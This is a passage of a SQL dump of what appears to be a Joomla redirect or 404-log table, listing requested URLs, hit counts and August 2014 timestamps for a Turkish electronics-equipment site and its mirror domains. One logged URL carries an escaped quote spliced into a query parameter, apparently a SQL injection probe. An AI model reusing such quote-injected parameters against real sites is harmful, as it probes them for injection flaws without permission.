00:00:00',301),(4979,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',2,0,'2014-08-28 19:23:40','0000-00-00 00:00:00',301),(4980,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-28 19:41:04','0000-00-00 00:00:00',301),(4981,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-28 20:23:34','0000-00-00 00:00:00',301),(4982,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-28 20:45:35','0000-00-00 00:00:00',301),(4983,'http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=46&Itemid=67&lang=tr','','http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=46&Itemid=67&lang=tr','',3,0,'2014-08-28 20:45:43','0000-00-00 00:00:00',301),(4984,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=0&lang=en','','','',1,0,'2014-08-28 21:58:53','0000-00-00 00:00:00',301),(4985,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-28 22:44:17','0000-00-00 00:00:00',301),(4986,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-28 23:06:33','0000-00-00 00:00:00',301),(4987,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',1,0,'2014-08-28 23:39:11','0000-00-00 00:00:00',301),(4988,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',4,0,'2014-08-28 23:40:04','0000-00-00 00:00:00',301),(4989,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=0&lang=en','','','',1,0,'2014-08-28 23:45:58','0000-00-00 00:00:00',301),(4990,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-28 23:54:58','0000-00-00 00:00:00',301),(4991,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=0&lang=tr','','','',1,0,'2014-08-29 00:53:29','0000-00-00 00:00:00',301),(4992,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',3,0,'2014-08-29 01:07:38','0000-00-00 00:00:00',301),(4993,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151','','','',1,0,'2014-08-29 01:10:40','0000-00-00 00:00:00',301),(4994,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82','','','',1,0,'2014-08-29 05:53:56','0000-00-00 00:00:00',301),(4995,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-29 06:49:56','0000-00-00 00:00:00',301),(4996,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=&lang=en','','','',1,0,'2014-08-29 07:09:57','0000-00-00 00:00:00',301),(4997,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',6,0,'2014-08-29 09:51:22','0000-00-00 00:00:00',301),(4998,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-29 10:27:18','0000-00-00 00:00:00',301),(4999,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',34,0,'2014-08-29 10:51:07','0000-00-00 00:00:00',301),(5000,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',33,0,'2014-08-29 10:51:20','0000-00-00 00:00:00',301),(5001,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',33,0,'2014-08-29 10:51:27','0000-00-00 00:00:00',301),(5002,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',34,0,'2014-08-29 10:51:37','0000-00-00 00:00:00',301),(5003,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',33,0,'2014-08-29 10:53:02','0000-00-00 00:00:00',301),(5004,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',33,0,'2014-08-29 10:53:43','0000-00-00 00:00:00',301),(5005,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',34,0,'2014-08-29 10:54:27','0000-00-00 00:00:00',301),(5006,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',33,0,'2014-08-29 10:54:38','0000-00-00 00:00:00',301),(5007,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',33,0,'2014-08-29 10:54:55','0000-00-00 00:00:00',301),(5008,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',33,0,'2014-08-29 10:55:55','0000-00-00 00:00:00',301),(5009,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',33,0,'2014-08-29 10:56:46','0000-00-00 00:00:00',301),(5010,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',33,0,'2014-08-29 10:56:56','0000-00-00 00:00:00',301),(5011,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',33,0,'2014-08-29 10:57:00','0000-00-00 00:00:00',301),(5012,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',34,0,'2014-08-29 10:57:11','0000-00-00 00:00:00',301),(5013,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',33,0,'2014-08-29 10:57:22','0000-00-00 00:00:00',301),(5014,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',31,0,'2014-08-29 10:57:31','0000-00-00 00:00:00',301),(5015,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',32,0,'2014-08-29 10:57:38','0000-00-00 00:00:00',301),(5016,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',31,0,'2014-08-29 10:57:44','0000-00-00 00:00:00',301),(5017,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',31,0,'2014-08-29 10:57:48','0000-00-00 00:00:00',301),(5018,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',26,0,'2014-08-29 10:58:02','0000-00-00 00:00:00',301),(5019,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119','','','',2,0,'2014-08-29 11:31:49','0000-00-00 00:00:00',301),(5020,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-29 11:52:28','0000-00-00 00:00:00',301),(5021,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=&lang=tr','','','',1,0,'2014-08-29 12:08:41','0000-00-00 00:00:00',301),(5022,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138','','','',2,0,'2014-08-29 12:13:57','0000-00-00 00:00:00',301),(5023,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50','','','',1,0,'2014-08-29 12:30:13','0000-00-00 00:00:00',301),(5024,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=&lang=tr','','','',1,0,'2014-08-29 13:02:43','0000-00-00 00:00:00',301),(5025,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',34,0,'2014-08-29 13:12:52','0000-00-00 00:00:00',301),(5026,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162','','','',2,0,'2014-08-29 13:38:17','0000-00-00 00:00:00',301),(5027,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',2,0,'2014-08-29 13:56:35','0000-00-00 00:00:00',301),(5028,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',1,0,'2014-08-29 14:03:19','0000-00-00 00:00:00',301),(5029,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-29 14:31:13','0000-00-00 00:00:00',301),(5030,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-29 14:34:48','0000-00-00 00:00:00',301),(5031,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-29 15:12:02','0000-00-00 00:00:00',301),(5032,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',3,0,'2014-08-29 15:35:02','0000-00-00 00:00:00',301),(5033,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',7,0,'2014-08-29 15:39:01','0000-00-00 00:00:00',301),(5034,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-08-29 15:50:15','0000-00-00 00:00:00',301),(5035,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-08-29 16:26:04','0000-00-00 00:00:00',301),(5036,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=0&lang=tr','','','',1,0,'2014-08-29 16:50:02','0000-00-00 00:00:00',301),(5037,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=&lang=en','','','',1,0,'2014-08-29 17:02:02','0000-00-00 00:00:00',301),(5038,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',12,0,'2014-08-29 17:12:19','0000-00-00 00:00:00',301),(5039,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',2,0,'2014-08-29 17:46:45','0000-00-00 00:00:00',301),(5040,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',1,0,'2014-08-29 18:08:10','0000-00-00 00:00:00',301),(5041,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',1,0,'2014-08-29 18:28:37','0000-00-00 00:00:00',301),(5042,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',1,0,'2014-08-29 18:30:19','0000-00-00 00:00:00',301),(5043,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-29 18:52:34','0000-00-00 00:00:00',301),(5044,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',3,0,'2014-08-29 20:15:41','0000-00-00 00:00:00',301),(5045,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-29 20:36:35','0000-00-00 00:00:00',301),(5046,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',2,0,'2014-08-29 20:48:13','0000-00-00 00:00:00',301),(5047,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-29 21:22:33','0000-00-00 00:00:00',301),(5048,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-08-29 21:45:18','0000-00-00 00:00:00',301),(5049,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',2,0,'2014-08-29 21:56:45','0000-00-00 00:00:00',301),(5050,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',2,0,'2014-08-29 22:23:44','0000-00-00 00:00:00',301),(5051,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-29 22:28:11','0000-00-00 00:00:00',301),(5052,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=0&lang=tr','','','',1,0,'2014-08-29 22:47:15','0000-00-00 00:00:00',301),(5053,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',3,0,'2014-08-29 23:14:02','0000-00-00 00:00:00',301),(5054,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=0&lang=en','','','',1,0,'2014-08-29 23:31:46','0000-00-00 00:00:00',301),(5055,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',2,0,'2014-08-30 00:17:23','0000-00-00 00:00:00',301),(5056,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-30 01:18:14','0000-00-00 00:00:00',301),(5057,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',1,0,'2014-08-30 01:49:35','0000-00-00 00:00:00',301),(5058,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-08-30 03:06:00','0000-00-00 00:00:00',301),(5059,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=0&lang=en','','','',1,0,'2014-08-30 03:23:24','0000-00-00 00:00:00',301),(5060,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=0&lang=tr','','','',1,0,'2014-08-30 04:09:09','0000-00-00 00:00:00',301),(5061,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=&lang=en','','','',1,0,'2014-08-30 04:11:10','0000-00-00 00:00:00',301),(5062,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-30 04:11:22','0000-00-00 00:00:00',301),(5063,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-30 04:43:17','0000-00-00 00:00:00',301),(5064,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-08-30 05:07:13','0000-00-00 00:00:00',301),(5065,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-30 05:14:17','0000-00-00 00:00:00',301),(5066,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-30 05:23:58','0000-00-00 00:00:00',301),(5067,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',1,0,'2014-08-30 05:24:58','0000-00-00 00:00:00',301),(5068,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-08-30 05:45:26','0000-00-00 00:00:00',301),(5069,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-30 06:08:23','0000-00-00 00:00:00',301),(5070,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-08-30 07:12:12','0000-00-00 00:00:00',301),(5071,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',1,0,'2014-08-30 07:41:41','0000-00-00 00:00:00',301),(5072,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-08-30 07:53:17','0000-00-00 00:00:00',301),(5073,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-08-30 08:53:57','0000-00-00 00:00:00',301),(5074,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',16,0,'2014-08-30 09:36:05','0000-00-00 00:00:00',301),(5075,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-30 09:51:51','0000-00-00 00:00:00',301),(5076,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',1,0,'2014-08-30 09:57:11','0000-00-00 00:00:00',301),(5077,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',1,0,'2014-08-30 10:01:58','0000-00-00 00:00:00',301),(5078,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',2,0,'2014-08-30 10:09:49','0000-00-00 00:00:00',301),(5079,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',1,0,'2014-08-30 10:17:55','0000-00-00 00:00:00',301),(5080,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&limitstart=5','','','',1,0,'2014-08-30 10:23:58','0000-00-00 00:00:00',301),(5081,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',43,0,'2014-08-30 10:26:43','0000-00-00 00:00:00',301),(5082,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',43,0,'2014-08-30 10:26:48','0000-00-00 00:00:00',301),(5083,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',43,0,'2014-08-30 10:26:53','0000-00-00 00:00:00',301),(5084,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',40,0,'2014-08-30 10:26:59','0000-00-00 00:00:00',301),(5085,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',46,0,'2014-08-30 10:27:05','0000-00-00 00:00:00',301),(5086,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',35,0,'2014-08-30 10:27:12','0000-00-00 00:00:00',301),(5087,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',1,0,'2014-08-30 10:27:21','0000-00-00 00:00:00',301),(5088,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',38,0,'2014-08-30 10:27:28','0000-00-00 00:00:00',301),(5089,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',41,0,'2014-08-30 10:27:41','0000-00-00 00:00:00',301),(5090,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',41,0,'2014-08-30 10:27:47','0000-00-00 00:00:00',301),(5091,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',39,0,'2014-08-30 10:27:55','0000-00-00 00:00:00',301),(5092,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',40,0,'2014-08-30 10:28:07','0000-00-00 00:00:00',301),(5093,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',48,0,'2014-08-30 10:28:12','0000-00-00 00:00:00',301),(5094,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',48,0,'2014-08-30 10:28:21','0000-00-00 00:00:00',301),(5095,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',39,0,'2014-08-30 10:28:28','0000-00-00 00:00:00',301),(5096,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',40,0,'2014-08-30 10:28:42','0000-00-00 00:00:00',301),(5097,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',42,0,'2014-08-30 10:28:49','0000-00-00 00:00:00',301),(5098,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',42,0,'2014-08-30 10:28:54','0000-00-00 00:00:00',301),(5099,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',40,0,'2014-08-30 10:29:01','0000-00-00 00:00:00',301),(5100,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',40,0,'2014-08-30 10:29:05','0000-00-00 00:00:00',301),(5101,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',39,0,'2014-08-30 10:29:12','0000-00-00 00:00:00',301),(5102,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',39,0,'2014-08-30 10:29:16','0000-00-00 00:00:00',301),(5103,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',19,0,'2014-08-30 10:29:21','0000-00-00 00:00:00',301),(5104,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',19,0,'2014-08-30 10:29:26','0000-00-00 00:00:00',301),(5105,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=&lang=tr','','','',1,0,'2014-08-30 12:06:51','0000-00-00 00:00:00',301),(5106,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=tr','','','',1,0,'2014-08-30 12:22:48','0000-00-00 00:00:00',301),(5107,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',1,0,'2014-08-30 12:42:35','0000-00-00 00:00:00',301),(5108,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',39,0,'2014-08-30 12:48:20','0000-00-00 00:00:00',301),(5109,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=&lang=tr','','','',1,0,'2014-08-30 13:17:39','0000-00-00 00:00:00',301),(5110,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',1,0,'2014-08-30 14:14:54','0000-00-00 00:00:00',301),(5111,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',2,0,'2014-08-30 14:24:58','0000-00-00 00:00:00',301),(5112,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-30 15:09:53','0000-00-00 00:00:00',301),(5113,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',1,0,'2014-08-30 15:38:41','0000-00-00 00:00:00',301),(5114,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',3,0,'2014-08-30 15:57:52','0000-00-00 00:00:00',301),(5115,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',1,0,'2014-08-30 16:34:26','0000-00-00 00:00:00',301),(5116,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-30 17:37:21','0000-00-00 00:00:00',301),(5117,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=0&lang=tr','','','',2,0,'2014-08-30 17:44:25','0000-00-00 00:00:00',301),(5118,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',3,0,'2014-08-30 17:51:16','0000-00-00 00:00:00',301),(5119,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=0&lang=tr','','','',2,0,'2014-08-30 17:53:12','0000-00-00 00:00:00',301),(5120,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-30 18:26:15','0000-00-00 